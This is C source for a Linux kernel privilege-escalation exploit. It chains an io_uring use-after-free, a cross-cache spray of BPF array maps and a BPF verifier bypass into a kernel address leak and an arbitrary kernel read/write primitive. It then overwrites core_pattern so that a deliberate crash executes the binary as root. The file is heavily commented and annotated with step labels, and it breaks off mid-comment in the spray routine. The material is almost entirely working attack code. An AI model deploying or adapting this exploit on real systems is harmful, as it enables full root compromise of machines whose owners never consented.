#define _GNU_SOURCE
#include <sched.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <err.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/bpf.h>
#include <sys/sendfile.h>
#include "io_uring.h" // Assuming this header contains io_uring related structs and macros

// --- Kernel Symbol Offsets (relative to STATIC_KBASE) ---
// These offsets need to be adjusted based on the target kernel version
// and are relative to a known kernel base address.
#define KERNEL_STATIC_BASE 0xffffffff81000000ULL
#define ARRAY_MAP_OPS_OFFSET (0xffffffff82c40600ULL - KERNEL_STATIC_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff83db6560ULL - KERNEL_STATIC_BASE)

// --- Utility Macros ---
#define SYSCHK(x)                                \
    ({                                           \
        typeof(x) __res = (x);                   \
        if (__res == (typeof(x))-1)              \
            err(1, "SYSCHK(" #x ")");            \
        __res;                                   \
    })

// For converting pointer to unsigned 64-bit integer
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))

// Define a single instance of the given token
#define X1(...) __VA_ARGS__
#define X2(...) X1(__VA_ARGS__), X1(__VA_ARGS__)
#define X4(...) X2(__VA_ARGS__), X2(__VA_ARGS__)
#define X8(...) X4(__VA_ARGS__), X4(__VA_ARGS__)
#define X16(...) X8(__VA_ARGS__), X8(__VA_ARGS__)
#define X32(...) X16(__VA_ARGS__), X16(__VA_ARGS__)
#define X64(...) X32(__VA_ARGS__), X32(__VA_ARGS__)
#define X128(...) X64(__VA_ARGS__), X64(__VA_ARGS__)

// Macro to repeat a sequence of tokens 127 times
#define X127(...) \
    X64(__VA_ARGS__), \
    X32(__VA_ARGS__), \
    X16(__VA_ARGS__), \
    X8(__VA_ARGS__), \
    X4(__VA_ARGS__), \
    X2(__VA_ARGS__), \
    X1(__VA_ARGS__)

// --- BPF Related Definitions ---
// Non-exported BPF commands and flags
#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define BPF_F_MMAPABLE 1024
#define BPF_FUNC_ringbuf_query 134
#define BPF_FUNC_ringbuf_reserve 131
#define BPF_MAP_TYPE_RINGBUF 27
#define BPF_FUNC_ringbuf_discard 133
#define BPF_FUNC_ringbuf_output 130

// BPF Instruction Macros (for readability)
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
    ((struct bpf_insn){.code = CODE,          \
                        .dst_reg = DST,        \
                        .src_reg = SRC,        \
                        .off = OFF,            \
                        .imm = IMM})

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                      \
    ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, \
                        .dst_reg = DST,                      \
                        .src_reg = SRC,                      \
                        .off = 0,                            \
                        .imm = (__u32)(IMM)}),               \
        ((struct bpf_insn){.code = 0,                        \
                            .dst_reg = 0,                    \
                            .src_reg = 0,                    \
                            .off = 0,                        \
                            .imm = ((__u64)(IMM)) >> 32})

#define BPF_MOV64_IMM(DST, IMM) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV64_REG(DST, SRC) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU64_IMM(OP, DST, IMM) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_REG(OP, DST, SRC) \
    BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
    BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_LD_MAP_FD(DST, MAP_FD) \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
    BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
    BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
    BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

// Helper for BPF_FUNC_map_lookup_elem
// Reg 9 (BPF_REG_9) usually holds the map FD
// Reg 10 (BPF_REG_10) is frame pointer
#define BPF_MAP_GET_ADDR(idx, dst)                                   \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                             \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                        \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                       \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                      \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,                    \
                     BPF_FUNC_map_lookup_elem),                      \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(),      \
        BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0)

#define BPF_MAP_GET(idx, dst)                                        \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                             \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                        \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                       \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                      \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,                    \
                     BPF_FUNC_map_lookup_elem),                      \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(),      \
        BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                      \
        BPF_MOV64_IMM(BPF_REG_0, 0)

// This macro is part of the BPF verifier bypass. It aims to read the byte at offset 0x16 from R5 + 0x20.
// If offset 0x16 increment by UAF write, verifier will thinks it's 0  but actually it's already 1
#define BPF_GRAB                                     \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, 0x20), /* Add 0x20 to R5 (map value address) */ \
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16), /* Load 1 byte from R5 + 0x16 into R4 */ \
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4) /* Add R4 to R6 */

// Array size for BPF instructions
#define INST(x) (sizeof(x) / sizeof(struct bpf_insn))

// --- Global Variables ---
int sockets[2]; // Sockets for BPF communication
char log_buf[0x10000]; // Buffer for BPF verifier logs
char tmp_buf[0x1000];    // Generic temporary buffer for I/O, BPF data, etc.
char magic[0x1000];  // Used to identify corrupted BPF map pages

// --- BPF Program Definitions ---
// @step(name="Triggering the Vulnerability")
// This BPF program is designed to leak a struct bpf_array address.
// It leverages a BPF verifier assumption (bpf_map_is_rdonly) combined with the UAF
// to achieve a controlled stack overflow using `bpf_skb_load_bytes_relative`.
struct bpf_insn array_map_leak_prog[] = {
    BPF_MOV64_IMM(BPF_REG_6, 0),
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // Store context (skb pointer) in R8

    // Load the FD of the targeted BPF map (dup2'd to 0x100) into BPF_REG_9.
    // This BPF map has reclaimed the memory of the `io_buffer_list` object.
    BPF_LD_MAP_FD(BPF_REG_9, 0x100),
    // Get the address of element 0 from this map's value into BPF_REG_5.
    // This points to the start of the array map's user-controlled data, which overlaps
    // with the freed `io_buffer_list` due to heap grooming.
    BPF_MAP_GET_ADDR(0, BPF_REG_5),

    BPF_MOV64_IMM(BPF_REG_6, 0),
    // Load 1 byte from offset 0x16 relative to `map_value_base` (BPF_REG_5) into R4.
    // This offset `0x16` (22 decimal) specifically aligns with the `io_buffer_list->head`
    // field within the `kmalloc-64` slab. Due to the UAF, this byte has been
    // incremented by the kernel (e.g., from 0 to 1). The BPF verifier, however,
    // sees the map as read-only and frozen, assuming this value is 0.
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4), // Add the UAF-incremented value (1) to R6. So R6 = 1.

    // A series of BPF_GRAB instructions. Each BPF_GRAB typically increments R5
    // and then loads a byte from R5 + 0x16 into R4, adding it to R6.
    // The exact effect depends on the data on the heap. The goal here is to
    // ensure that, at runtime, R6 (which will become `len`) holds the value `1`.
    // The verifier's calculation, however, would result in `0` for R6 if the map
    // is assumed to be uncorrupted and read-only. This difference is key for the bypass.
    X127(BPF_GRAB), // Repeats BPF_GRAB 127 times
    BPF_MOV64_REG(BPF_REG_4, BPF_REG_6), // Copy the manipulated R6 (which is 1 at runtime) to R4.

    // Setup for calling `BPF_FUNC_skb_load_bytes_relative` to perform a controlled stack overflow.
    // We place magic values on the BPF stack to help verify the overflow and determine offsets.
    //
    // Desired Stack Layout (relative to R10 - stack pointer):
    // R10 - 8:   0xCAFE (magic sentinel 1)
    // R10 - 16:  0xBACA (magic sentinel 2)
    // R10 - 24:  FD of the output map (0x101)
    // R10 - 32:  Pointer to R10 - 8 (i.e., address of 0xCAFE). This is the target for corruption.
    // R10 - 40:  Buffer where `skb_load_bytes_relative` will write.
    //
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0xCAFE),   // Place 0xCAFE at R10 - 8
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0xBACA),  // Place 0xBACA at R10 - 16
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),              // Load FD of the output map (0x101)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -24), // Store output map FD on stack at R10 - 24

    BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),        // R5 = current stack pointer (R10)
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -8),       // R5 = R10 - 8 (address of 0xCAFE)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -32), // Store the address of 0xCAFE (R10 - 8) at R10 - 32.
                                                     // This is the pointer that will be partially overwritten.

    // Call `bpf_skb_load_bytes_relative` to trigger the controlled overflow.
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),           // R1 = skb context (from R8)
    BPF_MOV64_IMM(BPF_REG_2, 0),                   // R2 = offset (start read from 0 in skb, i.e., `tmp_buf`)
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),          // R3 = destination buffer (start of write target on stack)
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -40),        // R3 = R10 - 40 (the buffer for writing)
    
    // R4 = len. At runtime, R4 is 1. The instruction `BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8)`
    // makes `len = 1 + 8 = 9`. The verifier, however, assumes R4 is 0, so it calculates `len = 0 + 8 = 8`.
    // This discrepancy allows a 9-byte write instead of the expected 8 bytes.
    // The 9th byte overflows into the first byte of the value at R10 - 32.
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8),          // R4 = 9 (runtime), 8 (verifier)
    BPF_MOV64_IMM(BPF_REG_5, 1),                   // R5 = flags (relative read from skb)
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

    // Validate the successful stack overflow and extract the leaked kernel address.
    // The 9-byte write caused a 1-byte overflow into the pointer at R10 - 32.
    // This partially corrupted pointer, when loaded into R5, is carefully crafted
    // to point to a location that allows us to find our magic values and kernel pointers.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_10, -32), // Load the *partially corrupted* pointer from R10 - 32 into R5.
                                                     // This value is no longer `R10 - 8`.

    // Check for the magic values read from the *kernel stack* using the corrupted pointer.
    // The 1-byte overflow at R10-32 has caused R5 to point to a misaligned location
    // relative to the original stack frame. By dereferencing R5 at specific offsets,
    // we expect to find our magic values (0xCAFE, 0xBACA) on the kernel stack.
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_5, 0),    // Load value at `*(R5 + 0)` into R6. If the corruption
                                                     // was successful, this should be 0xBACA from R10 - 16.
    BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, -8),   // Load value at `*(R5 - 8)` into R7. If successful,
                                                     // this should be a struct bpf_array pointer
                                                     // from an earlier stack frame.
    
    // Verification check: We expect the value at `*(R5 + 0)` (loaded into R6) to be `0xBACA`.
    // This confirms that the stack overflow correctly misaligned the pointer in R10 - 32
    // such that it now points to a location where 0xBACA resides on the kernel stack.
    // If R6 is NOT 0xBACA, jump 12 instructions (skip leak logic - overflow failed or misaligned).
    BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0xBACA, 12),
    
    // If the check passes, R7 (which holds the value from `*(R5 - 8)`) is now
    // expected to contain a pointer to our eBPF map, or a value from which
    // the struct bpf_array can be leaked.
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),                 // Load output map FD for userspace communication
    BPF_MAP_GET_ADDR(1, BPF_REG_8),                  // Get address of element 1 in the output map
    BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),    // Store the leaked kernel address (R7) into the output map.
    BPF_MOV64_IMM(BPF_REG_0, 0),                     // Return 0 (success)
    BPF_EXIT_INSN(),
};

// @step(name="Arbitrary Kernel Read/Write Primitive")
// This BPF program provides arbitrary kernel read/write capabilities once a kernel address
// has been leaked. It utilizes the same verifier bypass technique as the leak program
// but achieves a full 8-byte overwrite on the stack to inject arbitrary kernel addresses.
struct bpf_insn kernel_read_write_prog[] = {
    BPF_MOV64_IMM(BPF_REG_6, 0),
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // Store context (skb) in R8

    BPF_LD_MAP_FD(BPF_REG_9, 0x100),
    BPF_MAP_GET_ADDR(0, BPF_REG_5),

    BPF_MOV64_IMM(BPF_REG_6, 0),
    // Load the UAF-incremented byte (1) from the map's value into R4.
    BPF_LDX_MEM(BPF_B, BPF_REG_4, BPF_REG_5, 0x16),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_4), // R6 = 1 (runtime)

    X127(BPF_GRAB), // Continue to manipulate R6, ensuring it stays at 1 (runtime).
    BPF_MOV64_REG(BPF_REG_4, BPF_REG_6), // R4 = 1 (runtime), 0 (verifier)

    // Set up the BPF stack with sentinels for the controlled overflow.
    // These sentinels will be fully overwritten by the `skb_load_bytes_relative` call
    // with the target kernel address provided from userspace.
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0xCAFE),   // Magic sentinel 1
    BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0xBACA),  // Magic sentinel 2

    BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),         // R5 = SP
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -8),        // R5 = SP - 8 (address of 0xCAFE)
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -32), // Store the original address of 0xCAFE (R10 - 8)
                                                     // at R10 - 32. This is the stack location
                                                     // that will be completely overwritten with our arbitrary address.

    // Calculate `len` for `skb_load_bytes_relative` to achieve a controlled 16-byte write.
    // At runtime, R4 is 1.
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_4, 8),          // R4 = 1 * 8 = 8 (runtime). Verifier still thinks R4 is 0.
    
    // Call `bpf_skb_load_bytes_relative` to perform the stack overflow.
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),           // R1 = skb context
    BPF_MOV64_IMM(BPF_REG_2, 0),                   // R2 = offset in skb (start reading from beginning of packet)
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),          // R3 = destination buffer on BPF stack
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -40),        // R3 = R10 - 40 (start of buffer to write into)
    // Final `len` calculation: At runtime, R4 is 8. `R4 + 8` makes R4 become 16.
    // The verifier, however, still thinks `len = 0 + 8 = 8`.
    // This allows `skb_load_bytes_relative` to read 16 bytes from the network packet (`tmp_buf`)
    // and write them starting from R10 - 40. This 16-byte write completely overwrites
    // the 8-byte value at R10 - 32 (where the pointer to 0xCAFE was) with user-controlled data.
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 8),          // R4 = 16 (runtime), 8 (verifier)
    BPF_MOV64_IMM(BPF_REG_5, 1),                   // R5 = flags (relative read from skb)
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

    // Arbitrary Read/Write Logic:
    // The value at `R10 - 32` has been fully overwritten by the `skb_load_bytes_relative`
    // call with the 64-bit target kernel address provided by userspace in the `tmp_buf`
    // (specifically, `tmp_buf[8]` to `tmp_buf[15]`).
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_10, -32), // Load the *user-controlled target kernel address*
                                                     // (now at R10 - 32) into R8.
                                                     // In the eyes of the verifier, R8 still holds
                                                     // a safe pointer to the BPF stack. In reality, it's
                                                     // an arbitrary kernel address.
    BPF_LD_MAP_FD(BPF_REG_9, 0x101),                 // Load output map FD
    // Get control flag: Loads the *value* of element 1 from the output map (FD 0x101) into R7.
    // This value (0 for read, 1 for write) determines the operation.
    BPF_MAP_GET(1, BPF_REG_7),                       
    // Get data buffer address: Gets the *address* of element 2 from the output map into R6.
    // This is where read data is stored, or write data is loaded from.
    BPF_MAP_GET_ADDR(2, BPF_REG_6),                  

    // If R7 != 0 (meaning it's a write operation), jump to the write path.
    BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 4), 

    // Read Path (R7 == 0):
    // Read 8 bytes (a 64-bit value) from the target kernel address (R8) into R5.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0), 
    // Store the read value (R5) into element 2 of the output map (pointed to by R6).
    BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_5, 0), 
    BPF_MOV64_IMM(BPF_REG_0, 0),                  // Return 0 (success)
    BPF_EXIT_INSN(),

    // Write Path (R7 != 0):
    // Load the 64-bit value to write from element 2 of the output map (pointed to by R6) into R5.
    BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_6, 0), 
    // Write this value (R5) to the target kernel address (R8).
    BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0), 
    BPF_MOV64_IMM(BPF_REG_0, 0),                  // Return 0 (success)
    BPF_EXIT_INSN(),
};


// --- Function Declarations ---
static int util_bpf(int cmd, void *attr, size_t n);
static int setup_bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
                                unsigned int value_size, unsigned int max_entries,
                                unsigned int map_fd);
static int setup_bpf_create_mmapable_map(enum bpf_map_type map_type, unsigned int key_size,
                                         unsigned int value_size, unsigned int max_entries,
                                         unsigned int map_fd);
static int setup_bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
                               int insn_cnt, const char *license);
static int util_bpf_lookup_elem(int fd, const void *key, void *value);
static int util_bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags);
static int util_bpf_map_freeze(int fd);
static int util_update_elem(int mapfd, int key, size_t val);
static size_t util_get_elem(int mapfd, int key);
static int load_leak_bpf_prog(void);
static int load_read_write_bpf_prog(void);
static size_t leak_kernel_read64(size_t addr);
static size_t exploit_kernel_write64(size_t addr, size_t val);
static void setup_cpu_affinity(int cpu_id);
static int util_check_core_pattern(void);
static void exploit_trigger_core_dump(char *cmd);
static void vuln_setup_io_uring_buffer_ring(int uring_fd, char *res_buffer,
                                            struct io_uring_buf_ring *ring_buffer);
static void vuln_trigger_io_uring_uaf(int uring_fd, int pipe_fd_read, 
                                      unsigned char *sq_ring,
                                      struct io_uring_sqe *sqes,
                                      struct io_uring_params *params);
static void spray_cross_cache_bpf_maps(int *bpf_map_fd, int (*prog_bpf_fds)[2]);

// --- Function Implementations ---

// Generic BPF syscall wrapper
static int util_bpf(int cmd, void *attr, size_t n) {
    return syscall(__NR_BPF, cmd, attr, n);
}

// Wrapper for BPF_MAP_CREATE
static int setup_bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
                                unsigned int value_size, unsigned int max_entries,
                                unsigned int map_fd) {
    union bpf_attr attr = {.map_type = map_type,
                           .key_size = key_size,
                           .value_size = value_size,
                           .max_entries = max_entries,
                           .inner_map_fd = map_fd}; // This parameter is usually for nested maps

    return util_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

// Wrapper for BPF_MAP_CREATE with BPF_F_MMAPABLE and BPF_F_RDONLY_PROG flags
static int setup_bpf_create_mmapable_map(enum bpf_map_type map_type, unsigned int key_size,
                                         unsigned int value_size, unsigned int max_entries,
                                         unsigned int map_fd) {
    union bpf_attr attr = {.map_type = map_type,
                           .key_size = key_size,
                           .value_size = value_size,
                           .max_entries = max_entries,
                           .inner_map_fd = map_fd,
                           .map_flags = BPF_F_MMAPABLE | BPF_F_RDONLY_PROG}; // Important flags for the exploit

    return util_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

// Wrapper for BPF_PROG_LOAD
static int setup_bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
                               int insn_cnt, const char *license) {
    union bpf_attr attr = {
        .prog_type = type,
        .prog_flags = BPF_F_TEST_RND_HI32, // Helps with verifier
        .insns = ptr_to_u64(insns),
        .insn_cnt = insn_cnt,
        .license = ptr_to_u64(license),
        .log_buf = (size_t)log_buf,
        .log_size = sizeof(log_buf),
        .log_level = 3, // Enable verbose logging for debugging
    };

    return util_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}

// Wrapper for BPF_MAP_LOOKUP_ELEM
static int util_bpf_lookup_elem(int fd, const void *key, void *value) {
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
    };

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)));
}

// Wrapper for BPF_MAP_UPDATE_ELEM
static int util_bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags) {
    union bpf_attr attr = {
        .map_fd = fd,
        .key = ptr_to_u64(key),
        .value = ptr_to_u64(value),
        .flags = flags,
    };

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)));
}

// Wrapper for BPF_MAP_FREEZE
static int util_bpf_map_freeze(int fd) {
    union bpf_attr attr = {
        .map_fd = fd,
    };

    return SYSCHK(syscall(__NR_BPF, BPF_MAP_FREEZE, &attr, sizeof(attr)));
}

// Helper to update an element in a BPF map
static int util_update_elem(int mapfd, int key, size_t val) {
    return util_bpf_update_elem(mapfd, &key, &val, 0);
}

// Helper to get an element from a BPF map
static size_t util_get_elem(int mapfd, int key) {
    size_t val;
    util_bpf_lookup_elem(mapfd, &key, &val);
    return val;
}

// Loads the BPF program for leaking kernel addresses
static int load_leak_bpf_prog() {
    char license[] = "GPL";
    return setup_bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, array_map_leak_prog,
                               INST(array_map_leak_prog), license);
}

// Loads the BPF program for arbitrary kernel read/write
static int load_read_write_bpf_prog() {
    char license[] = "GPL";
    return setup_bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, kernel_read_write_prog,
                               INST(kernel_read_write_prog), license);
}

// @step(name="Arbitrary Kernel Read/Write Primitive")
// Performs an arbitrary 64-bit kernel read using the BPF primitive.
static size_t leak_kernel_read64(size_t addr) {
    util_update_elem(0x101, 1, 0); // Set mode to read
    // Store the address to read from in the buffer sent over the socket.
    // The BPF program will read this value and use it as the target address.
    *(size_t *)(&tmp_buf[8]) = addr;
    SYSCHK(write(sockets[0], tmp_buf, 0x10)); // Trigger BPF program execution
    return util_get_elem(0x101, 2); // Get the read value from BPF map element 2
}

// @step(name="Arbitrary Kernel Read/Write Primitive")
// Performs an arbitrary 64-bit kernel write using the BPF primitive.
static size_t exploit_kernel_write64(size_t addr, size_t val) {
    util_update_elem(0x101, 1, 1); // Set mode to write
    util_update_elem(0x101, 2, val); // Store the value to write in BPF map element 2
    // Store the address to write to in the buffer sent over the socket.
    *(size_t *)(&tmp_buf[8]) = addr;
    SYSCHK(write(sockets[0], tmp_buf, 0x10)); // Trigger BPF program execution
    return 0;
}

// Sets the CPU affinity for the current process
static void setup_cpu_affinity(int cpu_id) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    SYSCHK(sched_setaffinity(0, sizeof(mask), &mask));
}

// Checks if the /proc/sys/kernel/core_pattern has been overwritten
static int util_check_core_pattern(void) {
    char core_pattern_buf[0x100] = {};
    int core_fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    if (core_fd == -1) {
        perror("open /proc/sys/kernel/core_pattern");
        return 0;
    }
    SYSCHK(read(core_fd, core_pattern_buf, sizeof(core_pattern_buf)));
    close(core_fd);
    // Expected core_pattern format after overwrite
    return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
}

// @step(name="Privilege Escalation")
// Triggers a program crash to initiate the core dump and execute our payload.
static void exploit_trigger_core_dump(char *cmd) {
    // Create a memfd to store the exploit binary
    int memfd = SYSCHK(memfd_create("", 0));
    // Copy current executable into memfd
    SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
    // Duplicate memfd to file descriptor 666, which will be executed by core_pattern
    SYSCHK(dup2(memfd, 666));
    close(memfd);

    // Wait until core_pattern is overwritten by the main process
    while (util_check_core_pattern() == 0)
        sleep(1);

    puts("Core pattern overwritten. Triggering crash for root shell!");
    // Trigger program crash to cause kernel to execute the program from core_pattern
    *(size_t *)0 = 0;
}

// @step(name="io_uring Use-After-Free Vulnerability")
// Sets up the io_uring buffer ring for the vulnerability.
static void vuln_setup_io_uring_buffer_ring(int uring_fd, char *res_buffer,
                                            struct io_uring_buf_ring *ring_buffer) {
    // Initialize the ring buffer with a single entry
    ring_buffer->bufs[0].addr = (size_t)res_buffer;
    ring_buffer->bufs[0].len = 0x1000;
    ring_buffer->tail = 1;

    struct io_uring_buf_reg reg_ring = {
        .ring_addr = (unsigned long)ring_buffer,
        .ring_entries = 1,
        .bgid = 1};

    // Register a large number of buffer rings.
    // This is part of the heap grooming to ensure `io_buffer_list` objects will cross cache later
    for (int i = 0; i < 0x1000; i++) {
        reg_ring.bgid = i; // Each ring gets a unique buffer group ID
        SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg_ring, 1));
    }
}

// @step(name="io_uring Use-After-Free Vulnerability")
// Triggers the io_uring use-after-free vulnerability (UAF).
// The vulnerability occurs when `io_uring` prepares an async IO_READV operation
// with a provided buffer list, but the buffer list is not correctly consumed/committed.
// This allows the buffer list to be unregistered (freed) prematurely, leading to UAF
// when the async operation later tries to access the freed memory.
// Primitive: Use-after-free increment primitive on `io_buffer_list` (kmalloc-64 slab)
// at offset 22 (corresponding to `bl->head` which is incremented).
static void vuln_trigger_io_uring_uaf(int uring_fd, int pipe_fd_read,
                                      unsigned char *sq_ring,
                                      struct io_uring_sqe *sqes,
                                      struct io_uring_params *params) {
    // SQE 0: A dummy read operation to keep the queue busy before trigger UAF at SQE 1, so link with SQE 1
    sqes[0] = (struct io_uring_sqe){
        .opcode = IORING_OP_READ,
        .flags = IOSQE_IO_LINK, // Link with the next SQE
        .fd = pipe_fd_read,
        .addr = (size_t)tmp_buf,
        .len = 1,
    };

    // SQE 1: The vulnerable IORING_OP_READV operation
    // IOSQE_BUFFER_SELECT is crucial as it uses the registered buffer ring.
    // IOSQE_IO_HARDLINK ensures the operation stays pending until explicitly completed.
    // buf_group is set to a specific ID (0x800) to target a specific `io_buffer_list`.
    struct iovec iov = {.iov_len = 0x1000};
    sqes[1] = (struct io_uring_sqe){
        .opcode = IORING_OP_READV,
        .flags = IOSQE_FIXED_FILE | IOSQE_BUFFER_SELECT | IOSQE_IO_HARDLINK,
        .fd = 0, // Using registered fixed dummy file descriptor (not part of the exploit).
        .addr = (size_t)&iov,
        .len = 1,
        .buf_group = 0x800, // This targets the `io_buffer_list` with bgid 0x800
    };

    // Submit the two SQEs to io_uring
    ((int *)(sq_ring + params->sq_off.array))[0] = 0; // Index of SQE 0
    ((int *)(sq_ring + params->sq_off.array))[1] = 1; // Index of SQE 1
    (*(int *)(sq_ring + params->sq_off.tail)) += 2; // Increment tail to signal new entries

    SYSCHK(syscall(SYS_io_uring_enter, uring_fd, 2, 0, 0, NULL, 0));

    // After submission, the `io_buffer_list` for bgid 0x800 is "prepared" but its
    // refcount is not incremented. We now unregister (free) a range of these buffers to make it cross cache.
    // This creates the UAF condition for the `io_buffer_list` at bgid 0x800.
    for (int i = 0x400; i < 0xc00; i++) { // Range that includes 0x800 
        struct io_uring_buf_reg unreg_ring = {.bgid = i};
        SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg_ring, 1));
    }
}

// @step(name="Heap Grooming and Cross-Cache Attack")
// Sprays BPF_MAP_TYPE_ARRAY to reclaim the memory of the freed `io_buffer_list` objects.
// This allows the UAF increment to hit a controlled BPF map object.
// Objects sprayed: bpf_array  (size:8192)
static void spray_cross_cache_bpf_maps(int *bpf_map_fd, int (*prog_bpf_fds)[2]) {
    // Create many BPF array maps. These map objects are typically allocated in kmalloc-64 slab,
    // which is the same cache as `io_buffer_list`. This ensures the UAF hits our controlled object.
    // BPF_F_MMAPABLE: Allows userspace to mmap the map's value for direct access.
    // BPF_F_RDONLY_PROG: Crucial for the BPF verifier bypass. It makes the verifier assume
